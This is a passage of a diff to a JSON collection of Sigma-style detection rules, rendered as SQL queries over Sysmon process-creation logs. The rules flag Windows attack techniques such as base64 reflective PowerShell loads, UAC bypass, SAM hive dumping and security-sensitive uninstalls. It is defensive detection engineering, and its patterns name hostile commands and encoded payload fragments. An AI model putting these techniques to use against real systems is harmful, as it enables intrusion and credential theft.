CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_image_missing.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Use Icacls to Hide File to Everyone", - "id": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "title": "Potential Command Line Path Traversal Evasion Attempt", + "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", "status": "experimental", - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", - "author": "frack113", + "description": "Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1036" ], "falsepositives": [ - "Legitimate use" + "Google Drive", + "Citrix" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'iCACLS.EXE' OR Image LIKE '%\\\\icacls.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/deny%' ESCAPE '\\' AND CommandLine LIKE '%S-1-1-0:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_icacls_deny.yml" + "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" }, { - "title": "Suspicious SYSVOL Domain Group Policy Access", - "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_sysvol_access.yml" + "filename": "proc_creation_win_powershell_base64_reflection_assembly_load.yml" }, { - "title": "HH.EXE Execution", - "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "title": "Suspicious Rundll32 Setupapi.dll Activity", + "id": "285b85b1-a555-4095-8652-a8a4106af63f", "status": "test", - "description": "Detects the usage of \"hh.exe\" executing recently modified .chm files.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\hh.exe' ESCAPE '\\' AND CommandLine LIKE '%.chm%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hh_chm_execution.yml" + "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" }, { - "title": "Non-privileged Usage of Reg or Powershell", - "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", + "title": "Use of PktMon.exe", + "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "status": "test", - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" ], - "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" + "filename": "proc_creation_win_lolbin_pktmon.yml" }, { - "title": "Suspicious Regsvr32 HTTP IP Pattern", - "id": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", - "status": "experimental", - "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", - "author": "Florian Roth (Nextron Systems)", + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "status": "test", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1220" ], "falsepositives": [ - "FQDNs that start with a number" + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /s%' ESCAPE '\\' AND CommandLine LIKE '% /u%' ESCAPE '\\' AND (CommandLine LIKE '% /i:http://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:http://9%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://1%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://2%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://3%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://4%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://5%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://6%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://7%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://8%' ESCAPE '\\' OR CommandLine LIKE '% /i:https://9%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (CommandLine LIKE '%/format%' ESCAPE '\\' OR CommandLine LIKE '%-format%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Format:List%' ESCAPE '\\' OR CommandLine LIKE '%Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%Format:table%' ESCAPE '\\' OR CommandLine LIKE '%Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%Format:value%' ESCAPE '\\' OR CommandLine LIKE '%Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%Format:csv%' ESCAPE '\\'))) OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_http_pattern.yml" + "filename": "proc_creation_win_wmic_xsl_script_processing.yml" }, { - "title": "Potential SPN Enumeration Via Setspn.EXE", - "id": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "status": "test", - "description": "Detects service principal name (SPN) enumeration used for Kerberoasting", - "author": "Markus Neis, keepwatch", + "title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "stable", + "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", + "author": "Markus Neis @Karneades", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.execution", + "attack.t1047", + "attack.t1059.001" ], "falsepositives": [ - "Administration activity" + "AppvClient", + "CCM", + "WinRM" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\setspn.exe' ESCAPE '\\' OR OriginalFileName = 'setspn.exe' OR (Description LIKE '%Query or reset the computer%' ESCAPE '\\' AND Description LIKE '%SPN attribute%' ESCAPE '\\')) AND CommandLine LIKE '%-q%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "proc_creation_win_setspn_spn_enumeration.yml" + "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" }, { - "title": "Ruby Inline Command Execution", - "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", - "status": "experimental", - "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Reg Add Open Command", + "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "status": "test", + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ruby_inline_command_execution.yml" + "filename": "proc_creation_win_reg_open_command.yml" }, { - "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", - "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "id": "eee00933-a761-4cd0-be70-c42fe91731e7", + "status": "test", + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.execution", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentImage LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" + "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" }, { - "title": "Sysmon Driver Unloaded Via Fltmc.EXE", - "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "status": "test", - "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", - "author": "Kirill Kiryanov, oscd.community", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "File Download Using ProtocolHandler.exe", - "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "title": "Windows Admin Share Mount Via Net.EXE", + "id": "3abd6094-7027-475f-9630-8ab9be7b9725", + "status": "test", + "description": "Detects when an admin share is mounted using net.exe", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "falsepositives": [ + "Administrators" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_net_use_mount_admin_share.yml" + }, + { + "title": "Suspicious New Instance Of An Office COM Object", + "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", "status": "experimental", - "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", - "author": "frack113", + "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of office automation via scripting" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" + "filename": "proc_creation_win_office_svchost_parent.yml" }, { - "title": "Arbitrary Command Execution Using WSL", - "id": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "status": "test", - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary linux and windows commands", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Automation and orchestration scripts may use this method to execute scripts etc.", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR OriginalFileName = 'wsl.exe') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --exec%' ESCAPE '\\' OR CommandLine LIKE '% --system%' ESCAPE '\\' OR CommandLine LIKE '% --shell-type %' ESCAPE '\\' OR CommandLine LIKE '% /mnt/c%' ESCAPE '\\' OR CommandLine LIKE '% --user root%' ESCAPE '\\' OR CommandLine LIKE '% -u root%' ESCAPE '\\')) AND NOT ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\consent.exe' ESCAPE '\\' AND Image LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Suspicious Execution of Powershell with Base64", - "id": "fb843269-508c-4b76-8b8d-88679db22ce7", - "status": "experimental", - "description": "Commandline to launch powershell with a base64 payload", - "author": "frack113", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "status": "test", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ "attack.execution", "attack.t1059.001" @@ -22905,1714 +22911,1748 @@ "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE 